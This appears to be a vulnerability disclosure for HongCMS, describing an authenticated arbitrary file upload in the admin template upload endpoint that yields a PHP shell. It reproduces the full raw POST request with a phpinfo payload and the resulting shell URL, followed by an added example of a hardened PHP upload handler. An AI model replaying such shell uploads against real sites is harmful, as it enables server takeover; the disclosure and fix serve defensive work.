HongCMS
Arbitrary File Upload Getshell
Steps To Reproduce:
1. Log in to the backstage as the admin.
2. POST shell data via /hongcms/admin/index.php/template
POST /hongcms/admin/index.php/template/upload HTTP/1.1
Host: 192.168.0.193
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.193/hongcms/admin/index.php/template
Content-Type: multipart/form-data; boundary=---------------------------132861034225313
Content-Length: 341
Cookie: hibext_instdsigdipv2=1; _ga=GA1.1.265473964.1530252217; _gid=GA1.1.1034335256.1530252217; YmTry9y6Wf3Znews=1; YmTry9y6Wf3Zadmin=1adc8a472890f6070d13d2cc3d19fd8c; YmTry9y6Wf3Zproduct=5
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------132861034225313
Content-Disposition: form-data; name="dir"


-----------------------------132861034225313
Content-Disposition: form-data; name="file"; filename="only.php"
Content-Type: application/octet-stream

<?php
phpinfo();
?>
-----------------------------132861034225313--
- The shell is then at http://192.168.0.193/hongcms/public/templates/only.php
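
One way to close this upload path, as an added example that is not HongCMS source code and not part of the original report: a handler that accepts the same `file` and `dir` fields but only stores allowlisted, non-executable template assets inside the template root. The function name `store_template_upload`, the `ALLOWED_EXT` list and the template root path are assumptions made for illustration.

```php
<?php
// Added example: hypothetical handler, not HongCMS source code.
// ALLOWED_EXT is an assumed allowlist of non-executable template assets.
const ALLOWED_EXT = ['html', 'htm', 'css', 'js', 'png', 'jpg', 'gif'];

function store_template_upload(array $file, string $dir, string $templateRoot): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }

    // Keep only the final path component of the client-supplied name.
    $name = basename(str_replace('\\', '/', (string) $file['name']));

    // Exactly one extension, taken from the allowlist. This rejects
    // "only.php", dotfiles such as ".htaccess", and double extensions
    // such as "only.php.jpg".
    if (!preg_match('/^[A-Za-z0-9_-]+\.([A-Za-z0-9]+)$/', $name, $m)
        || !in_array(strtolower($m[1]), ALLOWED_EXT, true)) {
        throw new RuntimeException('file type not allowed');
    }

    // Resolve the requested sub-directory and confirm it stays under the root.
    $root = realpath($templateRoot);
    $dest = realpath($templateRoot . '/' . $dir);
    if ($root === false || $dest === false || !is_dir($dest)
        || ($dest !== $root
            && strncmp($dest, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0)) {
        throw new RuntimeException('invalid target directory');
    }

    $target = $dest . DIRECTORY_SEPARATOR . $name;
    // move_uploaded_file() refuses source paths that did not come from a PHP upload.
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store upload');
    }
    return $target;
}

// Usage inside the upload action (field names "file" and "dir" as in the request above;
// the root path is an assumed location):
// store_template_upload($_FILES['file'], $_POST['dir'] ?? '', __DIR__ . '/public/templates');
```

Configuring the web server so that nothing under `public/templates` is handed to the PHP interpreter is a useful second layer, since it still holds if the extension check is bypassed or removed.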